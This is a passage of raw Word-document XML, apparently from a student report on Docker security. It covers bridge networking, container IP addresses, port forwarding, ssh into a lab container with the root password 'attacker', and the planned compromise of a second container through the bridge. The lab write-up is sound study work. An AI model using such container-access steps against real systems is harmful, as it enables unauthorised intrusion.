      <w:r w:rsidR="00450C76">
        <w:t>pace</w:t>
      </w:r>
      <w:r w:rsidR="0021092C">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00450C76">
        <w:t xml:space="preserve"> containing networking, file system, and isolated processes</w:t>
      </w:r>
      <w:r w:rsidR="00B43E4A">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="0036585C">
        <w:t xml:space="preserve"> Docker uses its default bridge network </w:t>
      </w:r>
      <w:r w:rsidR="00573496">
        <w:t xml:space="preserve">system to </w:t>
      </w:r>
      <w:r w:rsidR="00A6168E">
        <w:t xml:space="preserve">connect containers, though </w:t>
      </w:r>
      <w:r w:rsidR="005E6D67">
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="00A6168E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00635C63">
        <w:t>offers</w:t>
      </w:r>
      <w:r w:rsidR="00A6168E">
        <w:t xml:space="preserve"> various </w:t>
      </w:r>
      <w:r w:rsidR="00690FCF">
        <w:t xml:space="preserve">other </w:t>
      </w:r>
      <w:r w:rsidR="00A6168E">
        <w:t>options</w:t>
      </w:r>
      <w:r w:rsidR="00690FCF">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00706F6C">
        <w:t xml:space="preserve"> As for this project, </w:t>
      </w:r>
      <w:r w:rsidR="00706F6C">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">the containers </w:t>
      </w:r>
      <w:r w:rsidR="00F42C31">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="002D5C27">
        <w:t>shaped</w:t>
      </w:r>
      <w:r w:rsidR="00F42C31">
        <w:t xml:space="preserve"> to use the bridge network.</w:t>
      </w:r>
      <w:r w:rsidR="005A14F0">
        <w:t xml:space="preserve"> The three </w:t>
      </w:r>
      <w:r w:rsidR="00A34638">
        <w:t>containers are on the same Docker host</w:t>
      </w:r>
      <w:r w:rsidR="00217645">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006041BE">
        <w:t xml:space="preserve"> the Ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="00C0111E">
        <w:t>laptop</w:t>
      </w:r>
      <w:r w:rsidR="005D172E">
        <w:t xml:space="preserve">; however, they are </w:t>
      </w:r>
      <w:r w:rsidR="009F1195">
        <w:t xml:space="preserve">completely isolated from </w:t>
      </w:r>
      <w:r w:rsidR="001B723B">
        <w:t>it.</w:t>
      </w:r>
      <w:r w:rsidR="004F17E7">
        <w:t xml:space="preserve"> Figure 37 </w:t>
      </w:r>
      <w:r w:rsidR="002139FA">
        <w:t xml:space="preserve">is </w:t>
      </w:r>
      <w:r w:rsidR="00766EDF">
        <w:t>a portion</w:t>
      </w:r>
      <w:r w:rsidR="002139FA">
        <w:t xml:space="preserve"> output of </w:t>
      </w:r>
      <w:r w:rsidR="00046F2B" w:rsidRPr="00046F2B">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>docker network inspect bridge</w:t>
      </w:r>
      <w:r w:rsidR="00046F2B">
        <w:t xml:space="preserve"> command.</w:t>
      </w:r>
      <w:r w:rsidR="00E24740">
        <w:t xml:space="preserve"> As</w:t>
      </w:r>
      <w:r w:rsidR="003033FA">
        <w:t xml:space="preserve"> can be seen</w:t>
      </w:r>
      <w:r w:rsidR="00E24740">
        <w:t xml:space="preserve">, the </w:t>
      </w:r>
      <w:r w:rsidR="007A10B7">
        <w:t>important points</w:t>
      </w:r>
      <w:r w:rsidR="001B5688">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005D0DFC">
        <w:t xml:space="preserve">are </w:t>
      </w:r>
      <w:r w:rsidR="006E53D2">
        <w:t xml:space="preserve">highlighted for </w:t>
      </w:r>
      <w:r w:rsidR="009F4734">
        <w:t>brevity.</w:t>
      </w:r>
      <w:r w:rsidR="002F00C4">
        <w:t xml:space="preserve"> The conta</w:t>
      </w:r>
      <w:r w:rsidR="00876DE4">
        <w:t xml:space="preserve">iners are assigned with default IP address </w:t>
      </w:r>
      <w:r w:rsidR="001B6F0F">
        <w:t>generated by the Docker engine</w:t>
      </w:r>
      <w:r w:rsidR="00F80B06">
        <w:t xml:space="preserve"> as the following list</w:t>
      </w:r>
      <w:r w:rsidR="00CF6B77">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB1B139" w14:textId="584E1211" w:rsidR="007677A5" w:rsidRDefault="001F5BA0" w:rsidP="00CF6B77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">172.17.0.2/16 </w:t>
      </w:r>
      <w:r w:rsidR="00500469">
        <w:t xml:space="preserve">to container </w:t>
      </w:r>
      <w:r>
        <w:t>con_ssh</w:t>
      </w:r>
      <w:r w:rsidR="00500469">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7F27D1" w14:textId="4617FB1B" w:rsidR="001F5BA0" w:rsidRDefault="001F5BA0" w:rsidP="00CF6B77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>172.17.0.</w:t>
      </w:r>
      <w:r w:rsidR="00995CFB">
        <w:t xml:space="preserve">3/16 </w:t>
      </w:r>
      <w:r w:rsidR="00500469">
        <w:t>to container</w:t>
      </w:r>
      <w:r w:rsidR="00995CFB">
        <w:t xml:space="preserve"> con_nossh</w:t>
      </w:r>
      <w:r w:rsidR="00500469">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210907FD" w14:textId="136ADEAB" w:rsidR="00500469" w:rsidRDefault="00500469" w:rsidP="00CF6B77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="17"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">172.17.0.4/16 </w:t>
      </w:r>
      <w:r w:rsidR="0096250C">
        <w:t>to container alpine1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ECF781" w14:textId="77777777" w:rsidR="005922DC" w:rsidRPr="007677A5" w:rsidRDefault="005922DC" w:rsidP="005922DC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="780"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51818CC6" w14:textId="4C1C4981" w:rsidR="00670407" w:rsidRDefault="00301749" w:rsidP="00301749">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55612558" wp14:editId="56B4E80D">
            <wp:extent cx="4743213" cy="3765550"/>
            <wp:effectExtent l="0" t="0" r="635"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0750" cy="3771534"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="743CB2A7" w14:textId="2DFB581D" w:rsidR="009447FA" w:rsidRDefault="009447FA" w:rsidP="002A13C8">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="115" w:name="_Toc86858628"/>
      <w:r w:rsidRPr="002A13C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="002A13C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002A13C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002A13C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>37</w:t>
      </w:r>
      <w:r w:rsidRPr="002A13C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002A13C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="002A13C8" w:rsidRPr="002A13C8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>output of Docker network inspect bridge.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="115"/>
    </w:p>
    <w:p w14:paraId="74770F14" w14:textId="348ED54D" w:rsidR="006B0351" w:rsidRPr="006B0351" w:rsidRDefault="00E1146A" w:rsidP="006B0351">
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="006C1788">
        <w:t xml:space="preserve">command in figure 38 is used to obtain </w:t>
      </w:r>
      <w:r w:rsidR="001B1CFF">
        <w:t xml:space="preserve">and find the port </w:t>
      </w:r>
      <w:r w:rsidR="00313803">
        <w:t>forwar</w:t>
      </w:r>
      <w:r w:rsidR="001F50E8">
        <w:t>ded to</w:t>
      </w:r>
      <w:r w:rsidR="00E15838">
        <w:t xml:space="preserve"> the host machine</w:t>
      </w:r>
      <w:r w:rsidR="00F9474C">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C72043">
        <w:t xml:space="preserve"> The result</w:t>
      </w:r>
      <w:r w:rsidR="00304394">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00C72043">
        <w:t xml:space="preserve"> show that port 22 of container con_ssh is for</w:t>
      </w:r>
      <w:r w:rsidR="00C00167">
        <w:t>warded to the host TCP port 49153.</w:t>
      </w:r>
      <w:r w:rsidR="002606E1">
        <w:t xml:space="preserve"> This means that </w:t>
      </w:r>
      <w:r w:rsidR="00D20B43">
        <w:t>any external host can access the container through t</w:t>
      </w:r>
      <w:r w:rsidR="00B948A3">
        <w:t>he host port 49153.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC5C470" w14:textId="2DE0BE73" w:rsidR="006B7087" w:rsidRDefault="006B0351" w:rsidP="006B0351">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="602D2364" wp14:editId="66E3E390">
            <wp:extent cx="3803650" cy="7429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03650" cy="742950"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F70BF5" w14:textId="664E4EA0" w:rsidR="006535DD" w:rsidRDefault="006535DD" w:rsidP="00D24A84">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="116" w:name="_Toc86858629"/>
      <w:r w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>38</w:t>
      </w:r>
      <w:r w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="000B4EE0" w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r w:rsidR="00D24A84" w:rsidRPr="00304394">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>published to the host.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="116"/>
    </w:p>
    <w:p w14:paraId="5BA0441A" w14:textId="658FD893" w:rsidR="008B6A4D" w:rsidRPr="008B6A4D" w:rsidRDefault="006E0F4E" w:rsidP="008B6A4D">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Consequently, </w:t>
      </w:r>
      <w:r w:rsidR="005F70CD">
        <w:t xml:space="preserve">the author </w:t>
      </w:r>
      <w:r w:rsidR="004D0B50">
        <w:t>was able to ssh</w:t>
      </w:r>
      <w:r w:rsidR="005F70CD">
        <w:t xml:space="preserve"> into</w:t>
      </w:r>
      <w:r w:rsidR="00AA5297">
        <w:t xml:space="preserve"> th</w:t>
      </w:r>
      <w:r w:rsidR="00B753B7">
        <w:t xml:space="preserve">e exposed </w:t>
      </w:r>
      <w:r w:rsidR="0055181B">
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r w:rsidR="00AE0C88">
        <w:t xml:space="preserve">of con_ssh </w:t>
      </w:r>
      <w:r w:rsidR="0055181B">
        <w:t>via the forward</w:t>
      </w:r>
      <w:r w:rsidR="001259BD">
        <w:t>ed port 49153</w:t>
      </w:r>
      <w:r w:rsidR="0055181B">
        <w:t>, as shown i</w:t>
      </w:r>
      <w:r w:rsidR="004D0B50">
        <w:t xml:space="preserve">n </w:t>
      </w:r>
      <w:r w:rsidR="00662FF8">
        <w:t>39</w:t>
      </w:r>
      <w:r w:rsidR="007B5BFB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="001E1DB8">
        <w:t xml:space="preserve"> As mentioned above, the </w:t>
      </w:r>
      <w:r w:rsidR="003F20E1">
        <w:t xml:space="preserve">root </w:t>
      </w:r>
      <w:r w:rsidR="00264D2C">
        <w:t xml:space="preserve">user </w:t>
      </w:r>
      <w:r w:rsidR="003F20E1">
        <w:t xml:space="preserve">password </w:t>
      </w:r>
      <w:r w:rsidR="001F6586">
        <w:t>is attacker.</w:t>
      </w:r>
      <w:r w:rsidR="00F55B68">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00264D2C">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00DA50D4">
        <w:t>ven external hosts to the Docker host can also access the container via this forwarded port.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C129FE" w14:textId="7754E913" w:rsidR="00B948A3" w:rsidRDefault="00004001" w:rsidP="00003BBE">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32CD78E2" wp14:editId="548843B8">
            <wp:extent cx="4394200" cy="1346200"/>
            <wp:effectExtent l="0" t="0" r="635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94200" cy="1346200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="323D190F" w14:textId="064BD9BE" w:rsidR="00A83B58" w:rsidRDefault="00730629" w:rsidP="004A2017">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc86858630"/>
      <w:r w:rsidRPr="00031724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="00031724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00031724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00031724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00A53E61">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>39</w:t>
      </w:r>
      <w:r w:rsidRPr="00031724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00031724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00031724" w:rsidRPr="00031724">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ssh into the con_ssh via the forwarded port.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
    </w:p>
    <w:p w14:paraId="7C06B29F" w14:textId="434D892E" w:rsidR="003A6CF1" w:rsidRDefault="004A2017" w:rsidP="004A2017">
      <w:r>
        <w:t xml:space="preserve">The containers communicate with each other as they are </w:t>
      </w:r>
      <w:r w:rsidR="000B5F05">
        <w:t>connected</w:t>
      </w:r>
      <w:r w:rsidR="00FF0713">
        <w:t xml:space="preserve"> to the same</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de</w:t>
      </w:r>
      <w:r w:rsidR="000B5F05">
        <w:t>fault</w:t>
      </w:r>
      <w:r w:rsidR="00FF0713">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B5F05">
        <w:t>virtual bridge</w:t>
      </w:r>
      <w:r w:rsidR="00FF0713">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="008C534B">
        <w:t xml:space="preserve"> However, the default Docker network bridge </w:t>
      </w:r>
      <w:r w:rsidR="002B1B32">
        <w:t>does not</w:t>
      </w:r>
      <w:r w:rsidR="00576E4D">
        <w:t xml:space="preserve"> have the capabilities to filter </w:t>
      </w:r>
      <w:r w:rsidR="00180158">
        <w:t>network traffic or packets.</w:t>
      </w:r>
      <w:r w:rsidR="00206133">
        <w:t xml:space="preserve"> This means that external host</w:t>
      </w:r>
      <w:r w:rsidR="00AF19E0">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00206133">
        <w:t xml:space="preserve"> or any </w:t>
      </w:r>
      <w:r w:rsidR="00BF3962">
        <w:t xml:space="preserve">other </w:t>
      </w:r>
      <w:r w:rsidR="00206133">
        <w:t>container</w:t>
      </w:r>
      <w:r w:rsidR="00BF3962">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00206133">
        <w:t xml:space="preserve"> can exploit </w:t>
      </w:r>
      <w:r w:rsidR="00EF2CBA">
        <w:t>the vulnerabilities of the bridge</w:t>
      </w:r>
      <w:r w:rsidR="00AF19E0">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r w:rsidR="00BF3962">
        <w:t xml:space="preserve"> access </w:t>
      </w:r>
      <w:r w:rsidR="007B1ACA">
        <w:t>the inside containers.</w:t>
      </w:r>
      <w:r w:rsidR="007018E6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FB286D">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="007018E6">
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r w:rsidR="00FB286D">
        <w:t>exploit such vulnerabilities, t</w:t>
      </w:r>
      <w:r w:rsidR="00A359C8">
        <w:t>he first container</w:t>
      </w:r>
      <w:r w:rsidR="00330AD2">
        <w:t xml:space="preserve"> (con_ssh)</w:t>
      </w:r>
      <w:r w:rsidR="00A359C8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00973C16">
        <w:t>is configured</w:t>
      </w:r>
      <w:r w:rsidR="00E92306">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00973C16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C07480">
        <w:t>expos</w:t>
      </w:r>
      <w:r w:rsidR="00330AD2">
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00C07480">
        <w:t xml:space="preserve"> port 22</w:t>
      </w:r>
      <w:r w:rsidR="003A6CF1">
        <w:t xml:space="preserve"> to allow ssh connections</w:t>
      </w:r>
      <w:r w:rsidR="00A34E8A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E9680D">
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:r w:rsidR="004464E1">
        <w:t>the Docker host</w:t>
      </w:r>
      <w:r w:rsidR="00A34E8A">
        <w:t xml:space="preserve"> and external </w:t>
      </w:r>
      <w:r w:rsidR="00F63080">
        <w:t>hosts, as well as co</w:t>
      </w:r>
      <w:r w:rsidR="00E92306">
        <w:t>ntainers.</w:t>
      </w:r>
      <w:r w:rsidR="00D12E73">
        <w:t xml:space="preserve"> Conversely</w:t>
      </w:r>
      <w:r w:rsidR="00A43E53">
        <w:t>, the</w:t>
      </w:r>
      <w:r w:rsidR="00270D08">
        <w:t xml:space="preserve"> second container (con_nossh)</w:t>
      </w:r>
      <w:r w:rsidR="00ED72C4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B86503">
        <w:t>accepts</w:t>
      </w:r>
      <w:r w:rsidR="00DA453E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E350D">
        <w:t xml:space="preserve">neither </w:t>
      </w:r>
      <w:r w:rsidR="00DA453E">
        <w:t>ssh</w:t>
      </w:r>
      <w:r w:rsidR="007E17D7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A635AE">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="003E350D">
        <w:t>or any</w:t>
      </w:r>
      <w:r w:rsidR="007E17D7">
        <w:t xml:space="preserve"> other connections</w:t>
      </w:r>
      <w:r w:rsidR="00635CA6">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00370165">
        <w:t xml:space="preserve"> The aim is to compromise </w:t>
      </w:r>
      <w:r w:rsidR="000C4297">
        <w:t xml:space="preserve">the second container </w:t>
      </w:r>
      <w:r w:rsidR="00C13889">
        <w:t xml:space="preserve">from the </w:t>
      </w:r>
      <w:r w:rsidR="00E53F57">
        <w:t>host through its bridge IP address</w:t>
      </w:r>
      <w:r w:rsidR="009A5448">
        <w:t>, al</w:t>
      </w:r>
      <w:r w:rsidR="007D2BDA">
        <w:t xml:space="preserve">though </w:t>
      </w:r>
      <w:r w:rsidR="00E3296E">
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="00245325">
        <w:t xml:space="preserve">s ssh port </w:t>
      </w:r>
      <w:r w:rsidR="00BA739C">
        <w:t>is disabled.</w:t>
      </w:r>
      <w:r w:rsidR="00FB24CD">
        <w:t xml:space="preserve"> As shown in figure 40, the </w:t>
      </w:r>
      <w:r w:rsidR="00B8097D">
        <w:t xml:space="preserve">con_nossh container is logged into </w:t>
      </w:r>
      <w:r w:rsidR="00137B87">
        <w:t>from the Ubuntu machine</w:t>
      </w:r>
      <w:r w:rsidR="004C5C70">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00AF7A92">
        <w:t xml:space="preserve"> </w:t>
